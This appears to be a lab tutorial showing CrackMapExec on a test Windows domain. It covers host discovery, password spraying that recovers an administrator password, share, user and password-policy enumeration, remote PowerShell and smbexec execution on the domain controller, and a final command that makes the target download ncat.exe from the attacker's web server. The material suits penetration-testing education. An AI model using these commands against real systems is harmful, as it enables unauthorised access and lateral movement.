root@securitynik:# apt-get instal crackmapexec
Now that it is installed, we can start by looking at the help.
root@securitynik:/cme# crackmapexec --help usage: crackmapexec [-h] [-v] [-t THREADS] [-id CRED_ID [CRED_ID ...]] [-u USERNAME [USERNAME ...]] [-d DOMAIN | --local-auth] [-p PASSWORD [PASSWORD ...] | -H HASH [HASH ...]] [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--show-options] [--share SHARE] [--smb-port {139,445}] [--mssql-port PORT] [--server {http,https}] [--server-host HOST] [--server-port PORT] [--timeout TIMEOUT] [--gfail-limit LIMIT | --ufail-limit LIMIT | --fail-limit LIMIT] [--verbose] [--sam] [--lsa] [--ntds {vss,drsuapi}] [--ntds-history] [--ntds-pwdLastSet] [--wdigest {enable,disable}] [--shares] [--uac] [--sessions] [--disks] [--users] [--rid-brute [MAX_RID]] [--pass-pol] [--lusers] [--wmi QUERY] [--wmi-namespace NAMESPACE] [--spider [FOLDER]] [--content] [--exclude-dirs DIR_LIST] [--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]] [--depth DEPTH] [--exec-method {smbexec,wmiexec,atexec}] [--force-ps32] [--no-output] [-x COMMAND | -X PS_COMMAND] [--mssql] [--mssql-query QUERY] [--mssql-auth {windows,normal}] [target [target ...]] .... <truncated for brevity> ....
Now that we have the help. Let's see what we can learn about the remote hosts within our subnet. Without any credentials, we are able to see ...
root@securitynik:/cme# crackmapexec 10.0.0.100/24 CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) [*] KTHXBYE!
From above, we see that without any credentials, we were able to identify 3 hosts on the 10.0.0.0/24 subnet. Let's now add those hosts to a file which we can use in the future.
root@securitynik:/cme# echo 10.0.0.103 >> cme-hosts.txt root@securitynik:/cme# echo 10.0.0.3 >> cme-hosts.txt root@securitynik:/cme# echo 10.0.0.105 >> cme-hosts.txt root@securitynik:/cme# crackmapexec cme-hosts.txt CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) [*] KTHXBYE!
Now that we have a file consisting of the hosts, let's see what else we can figure out. First let's try to enumerate the shares:
root@securitynik:/# crackmapexec cme-hosts.txt --shares CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) [*] KTHXBYE!
The above does not look any different from what we had previously. Lets see what happens if we add some usernames and passwords to a file.
Let's add the usernames to the text file first.
root@securitynik:/cme# echo administrator >> username.txt root@securitynik:/cme# echo nakia >> username.txt root@securitynik:/cme# echo neysa >> username.txt root@securitynik:/cme# echo securitynik >> username.txt root@securitynik:/cme# echo saadia >> username.txt
Now let's add the passwords to a file.
root@securitynik:/cme# echo password >> password.txt root@securitynik:/cme# echo password >> password.txt root@securitynik:/cme# echo GuessMe >> password.txt root@securitynik:/cme# echo Testing1 >> password.txt
Let's try a password spraying attack to see if one of these passwords in the "passwords.txt" file work for one or more of the username in the "username.txt" file. At the sametime, let's enumerate the shares on any host we are able to successfully authenticate against.
root@securitynik:/cme#crackmapexec cme-hosts.txt -u username.txt -p password.txt --shares CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:Yahooecho password STATUS_LOGON_FAILURE CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE CME 10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:GuessMe STATUS_LOGON_FAILURE CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!) CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Yahooecho password STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:GuessMe STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Testing1 STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Yahooecho password STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:GuessMe STATUS_LOGON_FAILURE CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Testing1 STATUS_LOGON_FAILURE CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:Yahooecho password STATUS_LOGON_FAILURE CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE CME 10.0.0.105:445 SECNIK-2K19 [-] SECURITYNIK\neysa:GuessMe STATUS_LOGON_FAILURE CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\neysa:Testing1 CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating shares CME 10.0.0.103:445 SECURITYNIK-WIN SHARE Permissions CME 10.0.0.103:445 SECURITYNIK-WIN ----- ----------- CME 10.0.0.103:445 SECURITYNIK-WIN ShareFolder READ, WRITE CME 10.0.0.103:445 SECURITYNIK-WIN ADMIN$ READ, WRITE CME 10.0.0.103:445 SECURITYNIK-WIN IPC$ READ CME 10.0.0.103:445 SECURITYNIK-WIN C$ READ, WRITE CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating shares CME 10.0.0.105:445 SECNIK-2K19 SHARE Permissions CME 10.0.0.105:445 SECNIK-2K19 ----- ----------- CME 10.0.0.105:445 SECNIK-2K19 NETLOGON READ CME 10.0.0.105:445 SECNIK-2K19 SYSVOL READ CME 10.0.0.105:445 SECNIK-2K19 ADMIN$ NO ACCESS CME 10.0.0.105:445 SECNIK-2K19 IPC$ READ CME 10.0.0.105:445 SECNIK-2K19 C$ NO ACCESS [*] KTHXBYE!
From above we see the different passwords were tried and ultimately, we were successful using password "Testing1" with username "administrator" on host "SECURITYNIK-WIN". From the "(Pwn3d!)" above, we can say this system is owned. Think admin privileges.
At the same time, we see we were also able to determine the credentials for "neysa" as "Testing1" on the host "SECNIK-2k19".
Now that we know we have credentials that work, let's focus on using "administrator" and "Testing1" for the rest of our activities
Let's continue enumerating the hosts.
Let's first start with testing to determine whether or not User Access Control (UAC) is enabled.
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --uac CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!) CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating UAC status CME 10.0.0.105:445 SECNIK-2K19 1 - UAC Enabled .... <error occurred here> ... CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating UAC status CME 10.0.0.103:445 SECURITYNIK-WIN 1 - UAC Enabled [*] KTHXBYE!
From above, we see UAC is enabled on hosts "10.0.0.105:445 SECNIK-2K19" and "10.0.0.103:445 SECURITYNIK-WIN".
Let's continue enumerating. This time let's enumerate the disks on the hosts.
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --disks CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!) CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating disks CME 10.0.0.103:445 SECURITYNIK-WIN C: CME 10.0.0.103:445 SECURITYNIK-WIN D: CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating disks CME 10.0.0.105:445 SECNIK-2K19 C: CME 10.0.0.105:445 SECNIK-2K19 D: [*] KTHXBYE!
From above, we see that both "10.0.0.103:445 SECURITYNIK-WIN" and "10.0.0.105:445 SECNIK-2K19" are reporting that they have both a "C:" and a "D:" drive.
We are also able to enumerate existing sessions on the hosts as shown below:
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --sessions CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!) CME 10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating active sessions CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating active sessions [*] KTHXBYE!
Let's now enumerate the users on the systems:
root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --users CME 10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS) CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN) CME 10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!) CME 10.0.0.103:445 SECURITYNIK-WIN [+] Dumping users CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/FullName: CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/UserComment: CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/PrimaryGroupId: 513 CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/BadPasswordCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/LogonCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/FullName: CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/UserComment: CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/PrimaryGroupId: 513 CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/BadPasswordCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/LogonCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/FullName: CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/UserComment: CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/PrimaryGroupId: 513 CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/BadPasswordCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN Guest (501)/LogonCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/FullName: CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/UserComment: CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/PrimaryGroupId: 513 CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/BadPasswordCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/LogonCount: 7 CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/FullName: CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/UserComment: CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/PrimaryGroupId: 513 CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/BadPasswordCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/LogonCount: 83 CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/FullName: CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/UserComment: CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/PrimaryGroupId: 513 CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/BadPasswordCount: 0 CME 10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping users CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/FullName: CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 Administrator (500)/LogonCount: 33 CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/FullName: CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/PrimaryGroupId: 514 CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 Guest (501)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/FullName: CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 krbtgt (502)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/FullName: nakia CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 nakia (1103)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/FullName: neysa CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 neysa (1104)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/FullName: securitynik CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 securitynik (1105)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/FullName: saadia CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 saadia (1106)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/FullName: nik CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 nik (1107)/LogonCount: 0 CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/FullName: CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/UserComment: CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/PrimaryGroupId: 513 CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/BadPasswordCount: 0 CME 10.0.0.105:445 SECNIK-2K19 Prague (1110)/LogonCount: 0
From above, we can conclude that the device at "10.0.0.105:445 SECNIK-2K19" is more than likely an Active Directory domain controller. Now that we know what this device is, let's enumerate the domain policy:
root@securitynik:/cme#crackmapexec 10.0.0.105 --pass-pol -u administrator -p Testing1 CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping password policy CME 10.0.0.105:445 SECNIK-2K19 Minimum password length: 7 CME 10.0.0.105:445 SECNIK-2K19 Password history length: 24 CME 10.0.0.105:445 SECNIK-2K19 Maximum password age: 41 days 23 hours 52 minutes CME 10.0.0.105:445 SECNIK-2K19 Minimum password age: 23 hours 52 minutes CME 10.0.0.105:445 SECNIK-2K19 Account lockout threshold: 0 CME 10.0.0.105:445 SECNIK-2K19 Account lockout duration: None [*] KTHXBYE!
From above, an attacker now has tremendous visibility into the users in the domain as well information on the password policy to mount an effective password based attack. Realistically, we already have the administrator credentials. However, the information above is still helpful.
Let's do our final enumeration to list the currently logged on users to the host at "10.0.0.105:445 SECNIK-2K19 " which is reporting as a domain controller.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lusers CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Enumerating logged on users CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\Administrator LogonServer: SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$ CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$ CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$ CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$ CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$ CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$ CME 10.0.0.105:445 SECNIK-2K19 Username: SECURITYNIK\SECNIK-2K19$
From above we can conclude username "Administrator" is currently logged on. The account "SECNIK-2K19$" represent the computer account account. Note the "$" at the end.
Now that we have enumerated the various information from the hosts, let's now stick with the domain controller.
Let's run a Powershell command to get the list of processes running on the host.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X get-process CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command CME 10.0.0.105:445 SECNIK-2K19 #< CLIXML CME 10.0.0.105:445 SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName CME 10.0.0.105:445 SECNIK-2K19 ------- ------ ----- ----- ------ -- -- ----------- CME 10.0.0.105:445 SECNIK-2K19 84 6 2824 992 0.17 840 1 cmd CME 10.0.0.105:445 SECNIK-2K19 76 5 3280 3708 0.02 4696 0 cmd CME 10.0.0.105:445 SECNIK-2K19 251 13 8036 1212 3.34 4088 1 conhost CME 10.0.0.105:445 SECNIK-2K19 147 9 7112 12512 0.05 4912 0 conhost CME 10.0.0.105:445 SECNIK-2K19 330 13 2172 5572 0.66 352 0 csrss CME 10.0.0.105:445 SECNIK-2K19 304 15 2204 5192 0.61 424 1 csrss CME 10.0.0.105:445 SECNIK-2K19 395 15 5472 17024 0.78 3024 1 ctfmon CME 10.0.0.105:445 SECNIK-2K19 381 32 16200 21988 5.03 1996 0 dfsrs CME 10.0.0.105:445 SECNIK-2K19 191 13 2584 7700 0.03 1160 0 dfssvc CME 10.0.0.105:445 SECNIK-2K19 215 16 3288 11392 0.06 2416 1 dllhost CME 10.0.0.105:445 SECNIK-2K19 10366 7411 129432 128224 2.23 3472 0 dns CME 10.0.0.105:445 SECNIK-2K19 647 48 67024 123304 30.19 856 1 dwm CME 10.0.0.105:445 SECNIK-2K19 1805 78 63140 11888 21.97 3000 1 explorer .... CME 10.0.0.105:445 SECNIK-2K19 54 4 728 3156 0.03 1676 0 wlms CME 10.0.0.105:445 SECNIK-2K19 369 20 11468 22504 0.70 168 0 WmiPrvSE CME 10.0.0.105:445 SECNIK-2K19 351 13 6056 13148 0.67 4304 0 WmiPrvSE CME 10.0.0.105:445 SECNIK-2K19 174 11 2872 9004 0.05 4520 0 WmiPrvSE CME 10.0.0.105:445 SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
Very nice that we can use this tool to execute powershell commands from our Kali host. Hmmm. I wonder what else we can do. Let's see if we can get the host to download a malicious binary. Let's load Python's SimpleHTTPServer on port 443. Before we do that though, let's understand the directory structure of the host by executing:
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\\" --exec-method smbexec CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command via smbexec CME 10.0.0.105:445 SECNIK-2K19 Volume in drive C has no label. CME 10.0.0.105:445 SECNIK-2K19 Volume Serial Number is DA96-0589 CME 10.0.0.105:445 SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 Directory of c:\ CME 10.0.0.105:445 SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 09/15/2018 12:19 AM <DIR> PerfLogs CME 10.0.0.105:445 SECNIK-2K19 03/14/2019 12:37 PM <DIR> Program Files CME 10.0.0.105:445 SECNIK-2K19 09/15/2018 02:08 AM <DIR> Program Files (x86) CME 10.0.0.105:445 SECNIK-2K19 03/19/2019 03:41 PM <DIR> Tools CME 10.0.0.105:445 SECNIK-2K19 03/03/2019 11:19 PM <DIR> Users CME 10.0.0.105:445 SECNIK-2K19 03/13/2019 07:55 PM <DIR> Windows CME 10.0.0.105:445 SECNIK-2K19 0 File(s) 0 bytes CME 10.0.0.105:445 SECNIK-2K19 6 Dir(s) 31,761,924,096 bytes free [*] KTHXBYE!
Let's now see if we can download the "ncat.exe" and place it in the "Tools" folder. First we setup our web server using Python's SimpleHTTPServer on port 443.
root@securitynik:/usr/share/ncat-w32# ls ncat.exe README root@securitynik:/usr/share/ncat-w32# file ncat.exe ncat.exe: PE32 executable (console) Intel 80386, for MS Windows root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ...
Once again, we will leverage powershell. This time to get the host to download the "ncat.exe" from our attacking machine.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X "(New-Object System.Net.WebClient).DownloadFile('http://10.0.0.100:443/ncat.exe','c:\tools\ncat.exe')" CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command CME 10.0.0.105:445 SECNIK-2K19 #< CLIXML CME 10.0.0.105:445 SECNIK-2K19 <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
To verify "ncat.exe" has been download successfully, let's browse the tools directory:
root@securitynik:/# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\tools\ncat.exe" --exec-method smbexec CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command via smbexec CME 10.0.0.105:445 SECNIK-2K19 Volume in drive C has no label. CME 10.0.0.105:445 SECNIK-2K19 Volume Serial Number is DA96-0589 CME 10.0.0.105:445 SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 Directory of c:\tools CME 10.0.0.105:445 SECNIK-2K19 CME 10.0.0.105:445 SECNIK-2K19 04/03/2019 07:29 PM 1,667,584 ncat.exe CME 10.0.0.105:445 SECNIK-2K19 1 File(s) 1,667,584 bytes CME 10.0.0.105:445 SECNIK-2K19 0 Dir(s) 31,757,164,544 bytes free [*] KTHXBYE!
We can also confirm the file was downloaded by looking at the output from Python's SimpleHTTPServer
root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ... 10.0.0.100 - - [03/Apr/2019 22:20:47] "GET / HTTP/1.1" 200 - 10.0.0.100 - - [03/Apr/2019 22:20:47] code 404, message File not found 10.0.0.100 - - [03/Apr/2019 22:20:47] "GET /favicon.ico HTTP/1.1" 404 - 10.0.0.105 - - [03/Apr/2019 22:29:32] "GET /ncat.exe HTTP/1.1" 200 -
